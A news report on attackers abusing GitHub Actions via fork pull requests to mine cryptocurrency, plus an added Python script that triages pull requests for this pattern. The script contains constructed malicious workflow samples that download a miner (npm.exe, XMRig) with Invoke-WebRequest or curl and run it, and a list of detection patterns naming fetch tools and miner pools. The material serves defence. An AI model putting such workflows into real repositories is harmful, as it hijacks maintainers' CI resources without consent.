Attackers abuse GitHub Actions to mine cryptocurrency on GitHub’s servers in automated attacks.
GitHub Actions is a CI/CD feature for automating repetitive tasks in software workflows, and it is used extensively by developers across a large number of projects.
In these attacks, bad actors fork legitimate repositories, add a malicious GitHub Actions workflow to the fork, and then open a Pull Request against the original repository.
Justin Perdok, a Dutch security engineer who initially reported the scheme, shared a screenshot showing that at least 95 repositories had been targeted so far.
What makes the attack work is that the maintainer of the original project does not need to approve the malicious Pull Request. Perdok says that merely opening a Pull Request is enough to complete the attack, because all of the targeted projects have automated workflows that validate Pull Requests via Actions. (On a pull_request event, the workflow definition that runs is the one in the PR's own branch, so the fork's malicious workflow file is what the hosted runner executes.)
Once the workflow runs, GitHub's systems execute the attacker's code, which downloads a cryptocurrency miner from GitLab, hosted under the misleading name npm.exe, and runs it.
This npm.exe is a known crypto-miner and has nothing to do with the official Node.js installers or the Node Package Manager (npm).
After the initial discovery was reported, BleepingComputer came across copycat campaigns in which attackers create malicious Pull Requests targeting projects that use GitHub Actions. According to BleepingComputer, these attackers have targeted over 50 legitimate repositories so far.
In its tests, BleepingComputer wrote, the malicious EXE connected to the turtlecoin.herominers.com cryptocurrency pool and began mining coins.
BleepingComputer also analyzed a variation of these attacks in which the threat actors use the open-source XMRig crypto-miner, pulling it in directly from XMRig's official GitHub repository.
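As an added example (not code from the article, from BleepingComputer, Perdok or GitHub), the following Python script triages a pull request for the pattern described above: a workflow file changed from a fork that fires on pull_request and whose run steps fetch a remote binary and execute it, with indicators covering the npm.exe-from-GitLab, herominers pool and XMRig variants. The three sample workflows, their URLs, the pool address and the PR dictionary are constructed for illustration, and the YAML handling is a deliberately lightweight line-based heuristic rather than a full YAML parser.

```python
"""Triage a pull request for the GitHub Actions abuse described above.
Added example, not code from the article or from GitHub. Line-based
heuristic parsing of workflow YAML (no PyYAML dependency); all samples
below are constructed, including their URLs and pool addresses."""
import re

RUN_RE = re.compile(r'^(\s*)(-\s+)?run:\s*(.*)$')

# Constructed: the kind of workflow an attacker adds to a fork (PowerShell runner).
MALICIOUS_WORKFLOW = r"""name: ci
on: [pull_request]
jobs:
  build:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v2
      - name: test
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/example-user/tools/-/raw/main/npm.exe -OutFile npm.exe
          .\npm.exe -o turtlecoin.herominers.com:10380 -u someaddress
"""

# Constructed: the XMRig variant, fetching a release archive and running it.
XMRIG_WORKFLOW = r"""on: pull_request
jobs:
  x:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -L -o xmrig.tar.gz https://github.com/xmrig/xmrig/releases/download/v0.0.0/xmrig-linux-static-x64.tar.gz
          tar xzf xmrig.tar.gz && ./xmrig-linux-static-x64/xmrig -o pool.example:3333
"""

# Constructed: an ordinary PR-validation workflow that must not be flagged.
BENIGN_WORKFLOW = r"""name: ci
on:
  pull_request:
    branches: [main]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: npm ci
      - run: npm test
"""

# Indicators drawn from the campaigns described above.
INDICATORS = [
    ('downloads executable', re.compile(r'https?://\S+\.(exe|tar\.gz|zip)\b', re.I)),
    ('fetch tool', re.compile(r'\b(curl|wget|Invoke-WebRequest|iwr|Start-BitsTransfer)\b', re.I)),
    ('runs local binary', re.compile(r'(^|\s)(\.\\|\./)\S+')),
    ('known miner', re.compile(r'xmrig|herominers\.com|\bnpm\.exe\b|stratum\+?(tcp|ssl)?://', re.I)),
    ('pool argument', re.compile(r'(^|\s)-o\s+[\w.-]+:\d{2,5}\b')),  # -o host:port as used by XMRig-style miners
]


def extract_run_steps(text):
    """Return the command text of every `run:` step; block scalars (`run: |`)
    are joined into one string per step."""
    steps, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1)) + (2 if m.group(2) else 0)
        value = m.group(3).strip()
        if value[:1] in ('|', '>'):  # block scalar: consume deeper-indented lines
            body, i = [], i + 1
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > key_indent):
                body.append(lines[i].strip())
                i += 1
            steps.append('\n'.join(body).strip())
        else:
            steps.append(value)
            i += 1
    return steps


def triggers_on_pull_request(text):
    """True if the `on:` section lists pull_request, the event for which the
    workflow definition comes from the PR head, i.e. the fork."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r'^on:\s*(.*)$', line)
        if m:
            section = [m.group(1)]
            for nxt in lines[i + 1:]:
                if nxt.strip() and not nxt[0].isspace():
                    break
                section.append(nxt)
            return re.search(r'\bpull_request\b', '\n'.join(section)) is not None
    return False


def scan_workflow(text):
    """Indicator names hit by each run step, plus whether a fork PR can trigger it."""
    hits = []
    for n, cmd in enumerate(extract_run_steps(text)):
        names = [name for name, rx in INDICATORS if rx.search(cmd)]
        if names:
            hits.append((n, names))
    return {'pull_request_trigger': triggers_on_pull_request(text), 'hits': hits}


def triage_pull_request(pr):
    """pr = {'from_fork': bool, 'files': {path: content}} (constructed shape).
    'block' if a changed workflow names a known miner or both fetches and runs a
    binary; 'review' if a fork PR touches workflows at all; otherwise 'pass'."""
    reasons, blocked = [], False
    for path, content in pr['files'].items():
        if not path.startswith('.github/workflows/'):
            continue
        if pr['from_fork']:
            reasons.append(f'{path}: workflow changed in PR from fork')
        result = scan_workflow(content)
        for n, names in result['hits']:
            if 'known miner' in names or {'fetch tool', 'runs local binary'} <= set(names):
                blocked = True
                trig = 'auto-runs on pull_request' if result['pull_request_trigger'] else 'not PR-triggered'
                reasons.append(f'{path}: step {n} hit {names} ({trig})')
    return ('block' if blocked else 'review' if reasons else 'pass'), reasons


if __name__ == '__main__':
    print(triage_pull_request({'from_fork': True,
                               'files': {'.github/workflows/ci.yml': MALICIOUS_WORKFLOW}}))
```

Run a check like this from a bot that reads the PR's files through the API, not as a workflow inside the same repository: a pull_request workflow is exactly the thing the attacker controls. It complements, rather than replaces, the GitHub repository setting that requires maintainer approval before workflows run for first-time or outside contributors, and it is a heuristic, so a hit is a reason to read the diff, not a verdict on its own.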
GitHub stated that they were aware of these campaigns and had started actively investigating them.